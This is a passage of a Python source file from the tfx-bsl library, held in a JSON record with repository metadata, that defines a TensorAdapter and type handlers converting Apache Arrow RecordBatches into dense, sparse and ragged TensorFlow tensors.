TypeSpecs of those tensors by their names, i.e.\n if they have a shape, then the size of the first (batch) dimension is always\n unknown (None) because it depends on the size of the RecordBatch passed to\n ToBatchTensors().\n\n It is guaranteed that for any tensor_name in the given TensorRepresentations\n self.TypeSpecs()[tensor_name].is_compatible_with(\n self.ToBatchedTensors(...)[tensor_name])\n\n Sliced RecordBatches and LargeListArray columns having null elements backed by\n non-empty sub-lists are not supported and will yield undefined behaviour.\n \"\"\"\n\n __slots__ = [\n \"_arrow_schema\", \"_type_handlers\", \"_type_specs\", \"_original_type_specs\"\n ]\n\n def __init__(self, config: TensorAdapterConfig):\n\n self._arrow_schema = config.arrow_schema\n self._type_handlers = _BuildTypeHandlers(config.tensor_representations,\n config.arrow_schema)\n self._type_specs = {\n tensor_name: handler.type_spec\n for tensor_name, handler in self._type_handlers\n }\n\n self._original_type_specs = (\n self._type_specs\n if config.original_type_specs is None else config.original_type_specs)\n\n for tensor_name, type_spec in self._type_specs.items():\n original_type_spec = self._original_type_specs.get(tensor_name, None)\n if original_type_spec is None or original_type_spec != type_spec:\n raise ValueError(\n \"original_type_specs must be a superset of type_specs derived from \"\n \"TensorRepresentations. But for tensor {}, got {} vs {}\".format(\n tensor_name, original_type_spec, type_spec))\n\n def OriginalTypeSpecs(self) -> Dict[str, tf.TypeSpec]:\n \"\"\"Returns the origin's type specs.\n\n A TFXIO 'Y' may be a result of projection of another TFXIO 'X', in which\n case then 'X' is the origin of 'Y'. And this method returns what\n X.TensorAdapter().TypeSpecs() would return.\n\n May equal to `self.TypeSpecs()`.\n\n Returns: a mapping from tensor names to `tf.TypeSpec`s.\n \"\"\"\n return self._original_type_specs\n\n def TypeSpecs(self) -> Dict[str, tf.TypeSpec]:\n \"\"\"Returns the TypeSpec for each tensor.\"\"\"\n return self._type_specs\n\n def ToBatchTensors(\n self,\n record_batch: pa.RecordBatch,\n produce_eager_tensors: Optional[bool] = None) -> Dict[str, Any]:\n \"\"\"Returns a batch of tensors translated from `record_batch`.\n\n Args:\n record_batch: input RecordBatch.\n produce_eager_tensors: controls whether the ToBatchTensors() produces\n eager tensors or ndarrays (or Tensor value objects). If None, determine\n that from whether TF Eager mode is enabled.\n\n Raises:\n RuntimeError: when Eager Tensors are requested but TF is not executing\n eagerly.\n ValueError: when Any handler failed to produce a Tensor.\n \"\"\"\n\n tf_executing_eagerly = tf.executing_eagerly()\n if produce_eager_tensors and not tf_executing_eagerly:\n raise RuntimeError(\n \"Eager Tensors were requested but eager mode was not enabled.\")\n if produce_eager_tensors is None:\n produce_eager_tensors = tf_executing_eagerly\n\n if not record_batch.schema.equals(self._arrow_schema):\n raise ValueError(\"Expected same schema.\")\n result = {}\n for tensor_name, handler in self._type_handlers:\n try:\n result[tensor_name] = handler.GetTensor(record_batch,\n produce_eager_tensors)\n except Exception as e:\n raise ValueError(\n \"Error raised when handling tensor '{}'\".format(tensor_name)) from e\n\n return result\n\n\nclass _TypeHandler(abc.ABC):\n \"\"\"Base class of all type handlers.\n\n A TypeHandler converts one or more columns in a RecordBatch to a TF Tensor\n or CompositeTensor according to a TensorRepresentation.\n\n All TypeHandlers are registered by TensorRepresentation types in\n _TYPE_HANDLER_MAP.\n \"\"\"\n\n __slots__ = []\n\n @abc.abstractmethod\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n \"\"\"Initializer.\n\n It can be assumed that CanHandle(arrow_schema, tensor_representation) would\n return true.\n\n Args:\n arrow_schema: the Arrow Schema that all the RecordBatches that\n self.GetTensor() will take conform to.\n tensor_representation: the TensorRepresentation that determines the\n conversion.\n \"\"\"\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n \"\"\"Returns the TypeSpec of the converted Tensor or CompositeTensor.\"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Any:\n \"\"\"Converts the RecordBatch to Tensor or CompositeTensor.\n\n The result must be of the same (not only compatible) TypeSpec as\n self.type_spec.\n\n Args:\n record_batch: a RecordBatch that is of the same Schema as what was passed\n at initialization time.\n produce_eager_tensors: if True, returns Eager Tensors, otherwise returns\n ndarrays or Tensor value objects.\n\n Returns:\n A Tensor or a CompositeTensor. Note that their types may vary depending\n on whether the TF eager mode is on.\n \"\"\"\n\n @staticmethod\n @abc.abstractmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n \"\"\"Returns true if an instance of the handler can handle the combination.\"\"\"\n\n\nclass _BaseDenseTensorHandler(_TypeHandler):\n \"\"\"Base class of DenseTensorHandlers.\"\"\"\n\n __slots__ = [\n \"_column_index\", \"_dtype\", \"_shape\", \"_unbatched_flat_len\",\n \"_convert_to_binary_fn\"\n ]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n dense_rep = tensor_representation.dense_tensor\n column_name = dense_rep.column_name\n self._column_index = arrow_schema.get_field_index(column_name)\n _, value_type = _GetNestDepthAndValueType(arrow_schema,\n path.ColumnPath(column_name))\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n unbatched_shape = [\n d.size for d in tensor_representation.dense_tensor.shape.dim\n ]\n self._shape = [None] + unbatched_shape\n self._unbatched_flat_len = int(np.prod(unbatched_shape, initial=1))\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n # TF's type stub is not correct about TypeSpec and its sub-classes.\n return typing.cast(tf.TypeSpec, tf.TensorSpec(self._shape, self._dtype))\n\n def _ListArrayToTensor(\n self, list_array: pa.Array,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n \"\"\"Converts a ListArray to a dense tensor.\"\"\"\n values = list_array.flatten()\n batch_size = len(list_array)\n expected_num_elements = batch_size * self._unbatched_flat_len\n if len(values) != expected_num_elements:\n raise ValueError(\n \"Unable to convert a {} to a tensor of type spec {}: size mismatch. \"\n \"Expected {} elements but got {}. \"\n \"If your data type is tf.Example, make sure that the feature \"\n \"is always present, and have the same length in all the examples. \"\n \"TFX users should make sure there is no data anomaly for the feature.\"\n .format(\n type(list_array), self.type_spec, expected_num_elements,\n len(values)))\n actual_shape = list(self._shape)\n actual_shape[0] = batch_size\n if self._convert_to_binary_fn is not None:\n values = self._convert_to_binary_fn(values)\n values_np = np.asarray(values).reshape(actual_shape)\n if produce_eager_tensors:\n return tf.convert_to_tensor(values_np)\n\n return values_np\n\n @staticmethod\n def BaseCanHandle(\n arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema,\n path.ColumnPath(tensor_representation.dense_tensor.column_name))\n # Can only handle 1-nested lists.\n return depth == 1 and _IsSupportedArrowValueType(value_type)\n\n\nclass _DenseTensorHandler(_BaseDenseTensorHandler):\n \"\"\"Handles conversion to dense.\"\"\"\n\n __slots__ = []\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n column = record_batch.column(self._column_index)\n return self._ListArrayToTensor(column, produce_eager_tensors)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n return (_BaseDenseTensorHandler.BaseCanHandle(arrow_schema,\n tensor_representation) and\n not tensor_representation.dense_tensor.HasField(\"default_value\"))\n\n\nclass _DefaultFillingDenseTensorHandler(_BaseDenseTensorHandler):\n \"\"\"Handles conversion to dense with default filling.\"\"\"\n\n __slots__ = [\"_default_fill\"]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n _, value_type = _GetNestDepthAndValueType(\n arrow_schema,\n path.ColumnPath(tensor_representation.dense_tensor.column_name))\n self._default_fill = _GetDefaultFill(\n self._shape[1:], value_type,\n tensor_representation.dense_tensor.default_value)\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n column = record_batch.column(self._column_index)\n column = array_util.FillNullLists(column, self._default_fill)\n return self._ListArrayToTensor(column, produce_eager_tensors)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n return (_BaseDenseTensorHandler.BaseCanHandle(arrow_schema,\n tensor_representation) and\n tensor_representation.dense_tensor.HasField(\"default_value\"))\n\n\nclass _VarLenSparseTensorHandler(_TypeHandler):\n \"\"\"Handles conversion to varlen sparse.\"\"\"\n\n __slots__ = [\"_column_index\", \"_dtype\", \"_convert_to_binary_fn\"]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n column_name = tensor_representation.varlen_sparse_tensor.column_name\n self._column_index = arrow_schema.get_field_index(column_name)\n _, value_type = _GetNestDepthAndValueType(arrow_schema,\n path.ColumnPath(column_name))\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n return typing.cast(\n tf.TypeSpec,\n tf.SparseTensorSpec(tf.TensorShape([None, None]), self._dtype))\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Any:\n array = record_batch.column(self._column_index)\n coo_array, dense_shape_array = array_util.CooFromListArray(array)\n dense_shape_np = dense_shape_array.to_numpy()\n values_array = array.flatten()\n if self._convert_to_binary_fn is not None:\n values_array = self._convert_to_binary_fn(values_array)\n values_np = np.asarray(values_array)\n coo_np = coo_array.to_numpy().reshape(values_np.size, 2)\n\n if produce_eager_tensors:\n return tf.sparse.SparseTensor(\n indices=tf.convert_to_tensor(coo_np),\n dense_shape=tf.convert_to_tensor(dense_shape_np),\n values=tf.convert_to_tensor(values_np))\n return tf.compat.v1.SparseTensorValue(\n indices=coo_np, dense_shape=dense_shape_np, values=values_np)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema,\n path.ColumnPath(\n [tensor_representation.varlen_sparse_tensor.column_name]))\n # Currently can only handle 1-nested lists, but can easily support\n # arbitrarily nested ListArrays.\n return depth == 1 and _IsSupportedArrowValueType(value_type)\n\n\nclass _SparseTensorHandler(_TypeHandler):\n \"\"\"Handles conversion to SparseTensors.\"\"\"\n\n __slots__ = [\n \"_index_column_indices\", \"_value_column_index\", \"_shape\", \"_dtype\",\n \"_coo_size\", \"_convert_to_binary_fn\"\n ]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n sparse_representation = tensor_representation.sparse_tensor\n self._index_column_indices = tuple(\n arrow_schema.get_field_index(c)\n for c in sparse_representation.index_column_names)\n self._value_column_index = arrow_schema.get_field_index(\n sparse_representation.value_column_name)\n self._shape = [dim.size for dim in sparse_representation.dense_shape.dim]\n _, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(sparse_representation.value_column_name))\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._coo_size = len(self._shape) + 1\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n batched_shape = [None] + [dim if dim != -1 else None for dim in self._shape]\n return typing.cast(\n tf.TypeSpec,\n tf.SparseTensorSpec(tf.TensorShape(batched_shape), self._dtype))\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Any:\n values_array = record_batch.column(self._value_column_index)\n values_parent_indices = array_util.GetFlattenedArrayParentIndices(\n values_array)\n indices_arrays = [np.asarray(values_parent_indices)]\n for index_column_index in self._index_column_indices:\n indices_arrays.append(\n np.asarray(record_batch.column(index_column_index).flatten()))\n flat_values_array = values_array.flatten()\n if self._convert_to_binary_fn is not None:\n flat_values_array = self._convert_to_binary_fn(flat_values_array)\n values_np = np.asarray(flat_values_array)\n coo_np = np.empty(shape=(len(values_np), self._coo_size), dtype=np.int64)\n try:\n np.stack(indices_arrays, axis=1, out=coo_np)\n except ValueError as e:\n raise ValueError(\"Error constructing the COO for SparseTensor. \"\n \"number of values: {}; \"\n \"size of each index array: {}\".format(\n len(values_np),\n [len(i) for i in indices_arrays])) from e\n\n dense_shape = [len(record_batch)] + self._shape\n\n if produce_eager_tensors:\n return tf.sparse.SparseTensor(\n indices=tf.convert_to_tensor(coo_np),\n dense_shape=tf.convert_to_tensor(dense_shape, dtype=tf.int64),\n values=tf.convert_to_tensor(values_np))\n return tf.compat.v1.SparseTensorValue(\n indices=coo_np, dense_shape=dense_shape, values=values_np)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n \"\"\"Returns whether `tensor_representation` can be handled.\"\"\"\n sparse_representation = tensor_representation.sparse_tensor\n if (len(sparse_representation.dense_shape.dim) != len(\n sparse_representation.index_column_names)):\n return False\n\n # All the index columns must be of integral types.\n for index_column in sparse_representation.index_column_names:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(index_column))\n if depth != 1 or not pa.types.is_integer(value_type):\n return False\n\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(sparse_representation.value_column_name))\n return depth == 1 and _IsSupportedArrowValueType(value_type)\n\n\nclass _RaggedTensorHandler(_TypeHandler):\n \"\"\"Handles conversion to RaggedTensors.\"\"\"\n\n __slots__ = [\n \"_column_index\",\n \"_value_path\",\n \"_dtype\",\n \"_row_partition_dtype\",\n \"_convert_to_binary_fn\",\n \"_inner_fixed_shape\",\n \"_values_fixed_shape\",\n \"_inferred_dimensions_elements\",\n \"_outer_ragged_rank\",\n \"_ragged_partitions\",\n \"_fixed_dimension_partitions\",\n ]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n ragged_representation = tensor_representation.ragged_tensor\n\n self._value_path = path.ColumnPath.from_proto(\n ragged_representation.feature_path)\n self._column_index = arrow_schema.get_field_index(\n ragged_representation.feature_path.step[0])\n self._outer_ragged_rank, value_type = _GetNestDepthAndValueType(\n arrow_schema, self._value_path)\n\n # Split partitions to the ones defining Ragged dimensions and the ones\n # defining the outer dimensions shape (through uniform row length\n # partitions).\n fixed_dimension = True\n ragged_partitions = []\n fixed_dimension_partitions = []\n # Reverse through the partitions (from outer partition to inner), in order\n # to extract the inner fixed shape of the resulting RaggedTensor.\n for partition in reversed(ragged_representation.partition):\n if partition.HasField(\"uniform_row_length\") and fixed_dimension:\n fixed_dimension_partitions.append(partition)\n else:\n fixed_dimension = False\n ragged_partitions.append(partition)\n self._ragged_partitions = ragged_partitions[::-1]\n self._fixed_dimension_partitions = fixed_dimension_partitions[::-1]\n\n inner_fixed_shape = []\n inferred_dimensions_elements = 1\n for partition in self._fixed_dimension_partitions:\n inner_fixed_shape.append(partition.uniform_row_length)\n inferred_dimensions_elements *= partition.uniform_row_length\n self._inner_fixed_shape = inner_fixed_shape\n self._values_fixed_shape = [-1] + inner_fixed_shape\n self._inferred_dimensions_elements = inferred_dimensions_elements\n\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._row_partition_dtype = ragged_representation.row_partition_dtype\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n row_splits_dtype = tf.int64\n if (self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.INT32):\n row_splits_dtype = tf.int32\n ragged_rank = self._outer_ragged_rank + len(self._ragged_partitions)\n shape = [None] * (ragged_rank + 1) + self._inner_fixed_shape\n return typing.cast(\n tf.TypeSpec,\n tf.RaggedTensorSpec(\n shape,\n self._dtype,\n ragged_rank=ragged_rank,\n row_splits_dtype=row_splits_dtype))\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n if (self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.INT32):\n offsets_dtype = np.int32\n elif (self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.INT64 or\n self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.UNSPECIFIED):\n offsets_dtype = np.int64\n\n if produce_eager_tensors:\n # Skip expensive validation since it's entirely dependent on the\n # implementation correctness given that the input RecordBatch is valid.\n factory = functools.partial(\n tf.RaggedTensor.from_row_splits, validate=False)\n else:\n factory = tf.compat.v1.ragged.RaggedTensorValue\n\n # A RaggedTensor is composed by the following dimensions:\n # [B, D_0, D_1, ..., D_N, P_0, P_1, ..., P_M, U_0, U_1, ..., U_P]\n #\n # These dimensions belong to different categories:\n # * B: Batch size dimension\n # * D_n: Dimensions specified by the nested structure from the schema and\n # the column path to the values. n >= 1.\n # * P_m: Dimensions specified by the partitions that do not specify a fixed\n # dimension size. m >= 0.\n # * U_p: Dimensions specified by the inner uniform row length partitions\n # that make the inner dimensions fixed. p>=0.\n\n # Get row splits of each level in the record batch.\n # Store the row splits for the Dn dimensions that store the representation\n # of the nested structure on the dataset schema.\n outer_row_splits = []\n\n column_path = self._value_path.suffix(1)\n column = record_batch.column(self._column_index)\n column_type = column.type\n # Keep track of an accessor for the parent struct, so we can access other\n # fields required to get future dimensions row splits.\n parent_field_accessor = lambda field: record_batch.column( # pylint:disable=g-long-lambda\n record_batch.schema.get_field_index(field))\n\n while True:\n # TODO(b/156514075): add support for handling slices.\n if column.offset != 0:\n raise ValueError(\n \"This record batch is sliced. We currently do not handle converting\"\n \" slices to RaggedTensors.\")\n if pa.types.is_struct(column_type):\n parent_column = column\n parent_field_accessor = parent_column.field\n column = column.field(column_path.initial_step())\n column_path = column_path.suffix(1)\n column_type = column.type\n elif _IsListLike(column_type):\n # Note that we are using raw offsets and values assuming that the array\n # is not sliced (validated above) and there is no null elements backed\n # by non-empty lists (too expensive to validate).\n outer_row_splits.append(np.asarray(column.offsets, dtype=offsets_dtype))\n column = column.values\n column_type = column.type\n else:\n break\n\n # Now that we have stored the row splits for the Dn dimensions, lets\n # start the construction of the RaggedTensor from the inner dimensions to\n # the outermost.\n\n # Take the values and set the shape for the inner most dimensions (Up)\n if self._convert_to_binary_fn is not None:\n column = self._convert_to_binary_fn(column)\n ragged_tensor = np.reshape(np.asarray(column), self._values_fixed_shape)\n\n # Build the RaggedTensor from the values and the specified partitions.\n\n # Now iterate from inner most partitions to outermost.\n # But first we need pop the last row split from the outer dimensions (D_n)\n # and scale it given the number of elements in the inner fixed dimensions.\n try:\n outer_last_row_split = _FloorDivide(outer_row_splits.pop(),\n self._inferred_dimensions_elements)\n except RuntimeError as e:\n raise ValueError(\n (\"The values features lenghts cannot support \"\n \"the claimed fixed shape {}\").format(self._inner_fixed_shape)) from e\n\n # Keep track of the previous dimension to help building row splits when an\n # uniform row length partition is found.\n prev_dimension = ragged_tensor.shape[0]\n for partition in reversed(self._ragged_partitions):\n if partition.HasField(\"uniform_row_length\"):\n # If a uniform row length partition is found, we need to scale down the\n # last outer dimension row split.\n try:\n outer_last_row_split = _FloorDivide(outer_last_row_split,\n partition.uniform_row_length)\n except RuntimeError as e:\n raise ValueError((\"The values features lengths cannnot support the \"\n \"specified uniform row length of size {}\").format(\n partition.uniform_row_length)) from e\n\n row_splits = np.arange(\n 0,\n prev_dimension + 1,\n partition.uniform_row_length,\n dtype=offsets_dtype)\n\n ragged_tensor = factory(ragged_tensor, row_splits=row_splits)\n try:\n prev_dimension = _FloorDivide(prev_dimension,\n partition.uniform_row_length)\n except RuntimeError as e:\n raise ValueError(\n (\"The previous ragged partitions contained {} elements, \"\n \"which are not valid with the specified uniform row length: {}\"\n ).format(prev_dimension, partition.uniform_row_length)) from e\n\n elif partition.HasField(\"row_length\"):\n row_length_array = parent_field_accessor(partition.row_length)\n\n # When the outer most dimension specified by the partitions (P_0) comes\n # from another array other than values, we need to update the last\n # dimension row splits defined by the nested structure (D_n) given the\n # offsets of the array.\n outer_last_row_split = np.asarray(\n row_length_array.offsets, dtype=offsets_dtype)\n\n # Build row splits.\n row_length = np.asarray(row_length_array.flatten())\n row_splits = np.zeros(len(row_length) + 1, dtype=offsets_dtype)\n np.cumsum(row_length, out=row_splits[1:])\n\n if prev_dimension != row_splits[-1]:\n raise ValueError(\n (\"The sum of row lengts provided in '{}' do not match \"\n \"with previous dimension found {}.\").format(\n partition.row_length, prev_dimension))\n\n ragged_tensor = factory(ragged_tensor, row_splits=row_splits)\n prev_dimension = len(row_length)\n\n else:\n raise ValueError(\"Empty partition found.\")\n\n # Add back the last row split from the outer dimensions (D_n).\n outer_row_splits.append(outer_last_row_split)\n\n # Apply the outer ragged dimensions to thre resulting tensor.\n # Now that the RaggedTensor is build up to the P_0 dimensions, we need to\n # specify the row splits for the D_n dimensions.\n for row_split in reversed(outer_row_splits):\n ragged_tensor = factory(ragged_tensor, row_splits=row_split)\n\n return ragged_tensor\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n \"\"\"Returns whether `tensor_representation` can be handled.\n\n The case where the tensor_representation cannot be handled is when:\n 1. Wrong column name / field name requested.\n 2. Non-leaf field is requested (for StructTypes).\n 3. There does not exist a ListType along the path.\n 4. Requested partitions paths are not an integer values or doesn't exist.\n\n Args:\n arrow_schema: The pyarrow schema.\n tensor_representation: The TensorRepresentation proto.\n \"\"\"\n ragged_tensor = tensor_representation.ragged_tensor\n if len(ragged_tensor.feature_path.step) < 1:\n return False\n\n value_path = path.ColumnPath.from_proto(ragged_tensor.feature_path)\n\n # Checking the outer dimensions represented by the value feature path.\n contains_list = False\n try:\n arrow_type = None\n for arrow_type in _EnumerateTypesAlongPath(arrow_schema, value_path):\n if _IsListLike(arrow_type):\n contains_list = True\n if pa.types.is_struct(arrow_type):\n # The path is depleted, but the last arrow_type is a struct. This means\n # the path is a Non-leaf field.\n return False\n except ValueError:\n # ValueError signifies wrong column name / field name requested.\n return False\n if not contains_list:\n return False\n\n # Check the auxiliar features that need to be accessed to form the inner\n # dimensions partitions.\n parent_path = value_path.parent()\n\n # Check the columns exists and have correct depth and type.\n for partition in ragged_tensor.partition:\n if partition.HasField(\"row_length\"):\n try:\n field_path = parent_path.child(partition.row_length)\n # To avoid loop undefined variable lint error.\n partition_type = arrow_schema.field(field_path.initial_step()).type\n for partition_type in _EnumerateTypesAlongPath(\n arrow_schema, field_path, stop_at_path_end=True):\n # Iterate through them all. Only interested on the last type.\n pass\n if not _IsListLike(partition_type) or not pa.types.is_integer(\n partition_type.value_type):\n return False\n except ValueError:\n # ValueError signifies wrong column name / field name requested.\n return False\n\n elif partition.HasField(\"uniform_row_length\"):\n if partition.uniform_row_length <= 0:\n return False\n else:\n return False\n\n # All checks passed successfully.\n return True\n\n\n# Mapping from TensorRepresentation's \"kind\" oneof field name to TypeHandler\n# classes. Note that one kind may have multiple handlers and the first one\n# whose CanHandle() returns true will be used.\n_TYPE_HANDLER_MAP = {\n \"dense_tensor\": [_DenseTensorHandler, _DefaultFillingDenseTensorHandler],\n \"varlen_sparse_tensor\": [_VarLenSparseTensorHandler],\n \"sparse_tensor\": [_SparseTensorHandler],\n \"ragged_tensor\": [_RaggedTensorHandler],\n}\n\n\ndef _BuildTypeHandlers(\n tensor_representations: Dict[str, schema_pb2.TensorRepresentation],\n arrow_schema: pa.Schema) -> List[Tuple[str, _TypeHandler]]:\n \"\"\"Builds type handlers according to TensorRepresentations.\"\"\"\n result = []\n for tensor_name, rep in tensor_representations.items():\n potential_handlers = _TYPE_HANDLER_MAP.get(rep.WhichOneof(\"kind\"))\n if not potential_handlers:\n raise ValueError(\"Unable to handle tensor {} with rep {}\".format(\n tensor_name, rep))\n found_handler = False\n for h in potential_handlers:\n if h.CanHandle(arrow_schema, rep):\n found_handler = True\n result.append((tensor_name, h(arrow_schema, rep)))\n break\n if not found_handler:\n raise ValueError(\"Unable to handle tensor {} with rep {} \"\n \"against schema: {}\".format(tensor_name, rep,\n arrow_schema))\n\n return result\n\n\ndef _IsListLike(arrow_type: pa.DataType) -> bool:\n return pa.types.is_list(arrow_type) or pa.types.is_large_list(arrow_type)\n\n\ndef _GetNestDepthAndValueType(\n arrow_schema: pa.Schema,\n column_path: path.ColumnPath) -> Tuple[int, pa.DataType]:\n \"\"\"Returns the depth of a leaf field, and its innermost value type.\n\n The Depth is constituted by the number of nested lists in the leaf field.\n\n Args:\n arrow_schema: The arrow schema to traverse.\n column_path: A path of field names. The path must describe a leaf struct.\n Returns: A Tuple of depth and arrow type\n \"\"\"\n arrow_type = arrow_schema.field(column_path.steps()[0]).type\n depth = 0\n\n for arrow_type in _EnumerateTypesAlongPath(arrow_schema, column_path):\n if _IsListLike(arrow_type):\n depth += 1\n\n return depth, arrow_type\n\n\ndef _EnumerateTypesAlongPath(arrow_schema: pa.Schema,\n column_path: path.ColumnPath,\n stop_at_path_end: bool = False) -> pa.DataType:\n \"\"\"Enumerates nested types along a column_path.\n\n A nested type is either a list-like type or a struct type.\n\n It uses `column_path`[0] to first address a field in the schema, and\n enumerates its type. If that type is nested, it enumerates its child and\n continues recursively until the column_path reaches an end. The child of a\n list-like type is its value type. The child of a struct type is the type of\n the child field of the name given by the corresponding step in the\n column_path.\n\n Args:\n arrow_schema: The arrow schema to traverse.\n column_path: A path of field names.\n stop_at_path_end: Whether to stop enumerating when all paths in the\n column_path have been visited. This will avoid keep enumerating on lists\n nesteness.\n\n Yields:\n The arrow type of each level in the schema.\n\n Raises:\n ValueError: If a step does not exist in the arrow schema.\n ValueError: If arrow_schema has no more struct fields, but we did not\n iterate through every field in column_path.\n \"\"\"\n field_name = column_path.initial_step()\n column_path = column_path.suffix(1)\n\n arrow_field = arrow_schema.field(field_name)\n arrow_type = arrow_field.type\n yield arrow_type\n\n while True:\n if stop_at_path_end and not column_path:\n break\n if pa.types.is_struct(arrow_type):\n # get the field from the StructType\n if not column_path:\n break\n curr_field_name = column_path.initial_step()\n column_path = column_path.suffix(1)\n try:\n arrow_field = arrow_type[curr_field_name]\n except KeyError as e:\n raise ValueError(\n \"Field '{}' could not be found in the current Struct: '{}'\".format(\n curr_field_name, arrow_type)) from e\n arrow_type = arrow_field.type\n elif _IsListLike(arrow_type):\n arrow_type = arrow_type.value_type\n else:\n yield arrow_type\n if column_path:\n raise ValueError(\n \"The arrow_schema fields are exhausted, but there are remaining \"\n \"fields in the column_path: '{}'\".format(column_path))\n break\n yield arrow_type\n\n\ndef _IsBinaryLike(arrow_type: pa.DataType) -> bool:\n return (pa.types.is_binary(arrow_type) or\n pa.types.is_large_binary(arrow_type) or\n pa.types.is_string(arrow_type) or\n pa.types.is_large_string(arrow_type))\n\n\ndef _IsSupportedArrowValueType(arrow_type: pa.DataType) -> bool:\n return (pa.types.is_integer(arrow_type) or pa.types.is_floating(arrow_type) or\n _IsBinaryLike(arrow_type))\n\n\ndef _ArrowTypeToTfDtype(arrow_type: pa.DataType) -> tf.DType:\n # TODO(zhuo): Remove the special handling for LargeString/Binary when\n # to_pandas_dtype() can handle them.\n if _IsBinaryLike(arrow_type):\n return tf.string\n return tf.dtypes.as_dtype(arrow_type.to_pandas_dtype())\n\n\ndef _GetAllowedDefaultValue(\n value_type: pa.DataType,\n default_value_proto: schema_pb2.TensorRepresentation.DefaultValue\n) -> Union[int, float, bytes]:\n \"\"\"Returns the default value set in DefaultValue proto or raises.\"\"\"\n kind = default_value_proto.WhichOneof(\"kind\")\n if kind in (\"int_value\", \"uint_value\") and pa.types.is_integer(value_type):\n value = getattr(default_value_proto, kind)\n iinfo = np.iinfo(value_type.to_pandas_dtype())\n if value <= iinfo.max and value >= iinfo.min:\n return value\n else:\n raise ValueError(\"Integer default value out of range: {} is set for a \"\n \"{} column\".format(value, value_type))\n elif kind == \"float_value\" and pa.types.is_floating(value_type):\n return default_value_proto.float_value\n elif kind == \"bytes_value\" and _IsBinaryLike(value_type):\n return default_value_proto.bytes_value\n\n raise ValueError(\n \"Incompatible default value: {} is set for a {} column\".format(\n kind, value_type))\n\n\ndef _GetDefaultFill(\n unbatched_shape: List[int], value_type: pa.DataType,\n default_value_proto: schema_pb2.TensorRepresentation.DefaultValue\n) -> pa.Array:\n \"\"\"Returns an Array full of the default value given in the proto.\"\"\"\n\n size = int(np.prod(unbatched_shape, initial=1))\n return pa.array(\n [_GetAllowedDefaultValue(value_type, default_value_proto)] * size,\n type=value_type)\n\n\ndef _GetConvertToBinaryFn(\n array_type: pa.DataType) -> Optional[Callable[[pa.Array], pa.Array]]:\n \"\"\"Returns a function that converts a StringArray to BinaryArray.\"\"\"\n\n if pa.types.is_string(array_type):\n return lambda array: array.view(pa.binary())\n if pa.types.is_large_string(array_type):\n return lambda array: array.view(pa.large_binary())\n return None\n\n\ndef _FloorDivide(array, num_elements: int):\n # The most common trivial case can avoid producing new arrays.\n if num_elements == 1:\n return array\n result, remainder = np.divmod(array, num_elements)\n if not np.all(remainder == 0):\n raise RuntimeError(\n \"Remainder found when dividing array with {}.\".format(num_elements))\n return result\n","repo_name":"tensorflow/tfx-bsl","sub_path":"tfx_bsl/tfxio/tensor_adapter.py","file_name":"tensor_adapter.py","file_ext":"py","file_size_in_byte":38363,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} 